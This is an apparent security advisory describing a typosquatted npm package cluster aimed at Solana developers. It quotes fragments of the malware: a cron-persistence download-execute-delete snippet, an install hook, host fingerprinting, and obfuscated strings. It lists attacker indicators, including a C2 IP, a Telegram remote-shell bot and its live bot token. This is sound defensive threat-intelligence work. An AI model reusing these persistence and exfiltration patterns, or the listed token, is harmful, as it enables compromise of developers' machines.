VDB

GCVE-110-OSM-2026-4

GCVE-110-OSM-2026-4
Advisory PublishedCVSS 9.6/10
Vulnetix · Advisory published June 8, 2026
This is a typosquatting supply-chain attack impersonating the legitimate `@solana` namespace. The fake, copycat scoped namespace `@solana-labs` is published by a throwaway account (`tihiwa5354@bncinema.com`) that also controls seven other Solana-themed squats. The clearest smoking gun is the cron persistence dropper embedded in both `lib/index.cjs.js` and `lib/index.esm.js`: `writeFileSync(tf,cr); cp.execSync('(crontab -l 2>/dev/null|grep -v csync;cat '+tf+')|crontab -', {timeout:3000}); fs.unlink(...)` — a textbook download-execute-delete pattern that writes an attacker-controlled cron payload and installs it silently. Accompanying this is active system fingerprinting via `os.userInfo()` and `os.hostname()`, public IP resolution via `ifconfig.me`, and HTTP callbacks to the hardcoded attacker IP `104.239.66.223:8899`. XOR-encoded byte arrays (`var t=[93,108,109,124,...]`) obfuscate strings that likely include the C2 address or additional payload URL, consistent with the 'obfuscated-exfil' combo flagged by the static analyzer. The 17-version publishing burst across a single day, fake maintainer email, and publisher-controlled typosquat cluster confirm adversarial intent targeting Solana developers. --- ### Linked Telegram C2 (enrichment 2026-06-09) The operator behind this cluster also runs an active Telegram Bot-API command channel alongside the 104.239.66.223:8899 HTTP callback: - Bot: @N1gga1337bot ("AI AGENT V1", bot id 8628389567) — exposes a /sh <cmd> remote-shell grammar (/help, /sh). - Operator account: @B4ck7p ("LD", Telegram user id 8346336575). - Bot token (IOC, live at capture): 8628389567:AAHeoLi034Vg6JIXsC_vqP-v-PXH2FhZIG4 - Observed activity (UTC): 2026-06-07 14:20–21:40 — operator issued /sh uname -a host-recon commands. Added Telegram IOCs - Telegram bot token: 8628389567:AAHeoLi034Vg6JIXsC_vqP-v-PXH2FhZIG4 - Telegram bot: @N1gga1337bot (id 8628389567) - Telegram operator: @B4ck7p (id 8346336575) ENTRY install.js (install-hook: node install.js) - Install Hook Executes Local JS File in package.json PERSISTENCE - Cron Job Persistence in install.js: "crontab -" DESTINATION - custom-c2: http://169.254.169.254/latest/meta-data/ (primary, plaintext) in install.js EXFIL - System Information Exfiltration in install.js: "os.hostname(); const USER=os.userInfo().username; const HOME=os.homedir(); const..." - Network Request in install.js: "https.request(" - System Information Collection in install.js: "os.userInfo()" OBFUSCATION - Dynamic Base64 Decoding in install.js: "Buffer.from(s,'base64')" - Decoded Base64 Content in install.js - Deobfuscation Failed in install.js ADDITIONAL FINDINGS - Download Execute Delete Pattern in install.js: "writeFileSync(t,c);execSync('(crontab -l 2>/dev/null|grep -v rpc-pool;cat '+t+')..." - Shell Command Execution in install.js: "require('child_process')" - Brand New Package - Publisher Has Other Malicious Packages - Malicious Dependency Detected in package.json PAYLOAD FILES install.js INDICATORS (IOCs) - IP: 104.239.66.223 - urls: https://104.239.66.223:8899, https://solana-api.projectserum.com, https://rpc.ankr.com/solana - domains: bncinema.com, solana-api.projectserum.com, rpc.ankr.com - payloadFileHash: ba202fac4b64450a33e343e5efe9cc580a3d4b802251bb7e8addf04b7d650c35

Weaknesses (CWE)

CWE-506Embedded Malicious Code

Risk Scores

CVSS 3.1
9.6/10
Critical · CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

Affected Products

VendorProductVersionsPlatforms
unknowncr-static-shared-components* (affected), all (affected), all (affected), all (affected), all (affected), * (affected)
unknown@emilgroup/process-manager-sdkall (affected)
unknownsolana-rpc-poolall (affected)
unknownclob-client-sdks* (affected), all (affected), all (affected), all (affected), all (affected), * (affected), all (affected), * (affected)

Browse GCVE Records

73,040 records in the GCVE database · Updated July 15, 2026

No matching records found.

Explore Further

Investigate this vulnerability in the interactive console or download the raw GCVE record.

$ Console Community · 100/wk Open console ›